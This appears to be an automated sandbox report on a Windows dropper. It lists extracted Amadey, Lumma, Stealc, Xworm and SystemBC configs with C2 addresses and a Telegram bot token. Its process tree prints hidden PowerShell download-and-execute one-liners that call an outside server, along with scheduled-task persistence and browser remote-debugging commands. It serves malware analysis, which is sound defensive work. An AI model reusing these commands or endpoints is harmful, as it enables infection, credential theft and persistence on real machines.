Overview

overview

10

Static

static

3

6f44899dae...0e.exe

windows7-x64

10

6f44899dae...0e.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/02/2025, 02:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe

  • Size

    2.1MB

  • MD5

    6bc335ae3e7281ea3e46c5362fc2257a

  • SHA1

    7c82356ab52d44d4c3682578e143c1663695018d

  • SHA256

    6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e

  • SHA512

    c92a6d620c89d7243acfc989c9c74c9e40c7b6199974e9cc0b47561d2621f2c4520d1047ba9bc3b7b787ccd8ebeeec65a398f7763c225896803b0593e1fc5413

  • SSDEEP

    49152:iEfX+HJ9H1gO5nNcx/sygkWIA9XqHEwvece8tWNgLPHalhWm:Klt5nuJsyPOaEwGcztWObHYW

Score
10/10
amadeyhealerlummapovertystealerstealcsystembcvidarxworm9c9aa5a4d2cdrenocredential_accessdefense_evasiondiscoverydropperevasionexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz
Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3
Attributes
  • dns

    5.132.191.104

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

lumma

C2

https://prideforgek.fun/api

https://governoagoal.pw/api

https://executrixfinav.pw/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Poverty Stealer Payload 1 IoCs
  • Detect Vidar Stealer 8 IoCs
    stealer
  • Detect Xworm Payload 3 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

    stealerpovertystealer
  • Povertystealer family
    povertystealer
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 24 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 24 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 48 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 24 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 56 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
    "C:\Users\Admin\AppData\Local\Temp\6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:576
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
        "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2748
      • C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
        "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
        3⤵
        • Executes dropped EXE
        PID:1036
      • C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
        "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:444
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2080
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7259758,0x7fef7259768,0x7fef7259778
            5⤵
              PID:3004
            • C:\Windows\system32\ctfmon.exe
              ctfmon.exe
              5⤵
                PID:708
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:2
                5⤵
                  PID:316
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:8
                  5⤵
                    PID:2120
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:8
                    5⤵
                      PID:1660
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2284 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:1812
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:1580
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1328 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:2
                      5⤵
                        PID:2392
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1312 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:1280
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3480 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:8
                        5⤵
                          PID:904
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3596 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:8
                          5⤵
                            PID:2760
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3724 --field-trial-handle=1292,i,12120499367054582845,5979286773475154296,131072 /prefetch:8
                            5⤵
                              PID:2016
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\mohlx" & exit
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:852
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 10
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:2460
                        • C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
                          "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2776
                        • C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
                          "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2188
                        • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
                          "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1448
                        • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
                          "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Loads dropped DLL
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:2340
                          • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                            "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Downloads MZ/PE file
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1812
                            • C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe
                              "C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2656
                        • C:\Users\Admin\AppData\Local\Temp\1090673001\4e75175853.exe
                          "C:\Users\Admin\AppData\Local\Temp\1090673001\4e75175853.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2792
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            4⤵
                              PID:1748
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1784
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4040
                          • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                            "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:1928
                            • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                              "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2680
                          • C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
                            "C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3008
                            • C:\Users\Admin\AppData\Local\Temp\onefile_3008_133846639547782000\continental.exe
                              C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1600
                          • C:\Users\Admin\AppData\Local\Temp\1090975101\78869dfa0e.exe
                            "C:\Users\Admin\AppData\Local\Temp\1090975101\78869dfa0e.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:1032
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c schtasks /create /tn ZQEi5maoiYs /tr "mshta C:\Users\Admin\AppData\Local\Temp\C1Kbu62Lu.hta" /sc minute /mo 25 /ru "Admin" /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2752
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /tn ZQEi5maoiYs /tr "mshta C:\Users\Admin\AppData\Local\Temp\C1Kbu62Lu.hta" /sc minute /mo 25 /ru "Admin" /f
                                5⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:2420
                            • C:\Windows\SysWOW64\mshta.exe
                              mshta C:\Users\Admin\AppData\Local\Temp\C1Kbu62Lu.hta
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies Internet Explorer settings
                              PID:1484
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'G9QBWSPBX4JFZPQ7QHRVQPVZ3TJCSF9H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                5⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Downloads MZ/PE file
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3004
                                • C:\Users\Admin\AppData\Local\TempG9QBWSPBX4JFZPQ7QHRVQPVZ3TJCSF9H.EXE
                                  "C:\Users\Admin\AppData\Local\TempG9QBWSPBX4JFZPQ7QHRVQPVZ3TJCSF9H.EXE"
                                  6⤵
                                  • Modifies Windows Defender DisableAntiSpyware settings
                                  • Modifies Windows Defender Real-time Protection settings
                                  • Modifies Windows Defender TamperProtection settings
                                  • Modifies Windows Defender notification settings
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Windows security modification
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2916
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" "
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1964
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" any_word
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2992
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 2
                                5⤵
                                • System Location Discovery: System Language Discovery
                                • Delays execution with timeout.exe
                                PID:280
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2240
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2428
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2884
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1276
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:348
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2948
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /tn "kc3vMmaG4Re" /tr "mshta \"C:\Temp\sHDzOkCAI.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                5⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:1968
                              • C:\Windows\SysWOW64\mshta.exe
                                mshta "C:\Temp\sHDzOkCAI.hta"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                • Modifies Internet Explorer settings
                                PID:2484
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                  6⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Downloads MZ/PE file
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2376
                                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    7⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1792
                          • C:\Users\Admin\AppData\Local\Temp\1091044001\f2a4e67c19.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091044001\f2a4e67c19.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:960
                          • C:\Users\Admin\AppData\Local\Temp\1091045001\a8a3d6e65b.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091045001\a8a3d6e65b.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1648
                          • C:\Users\Admin\AppData\Local\Temp\1091046001\731b23e4b0.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091046001\731b23e4b0.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:3132
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM firefox.exe /T
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
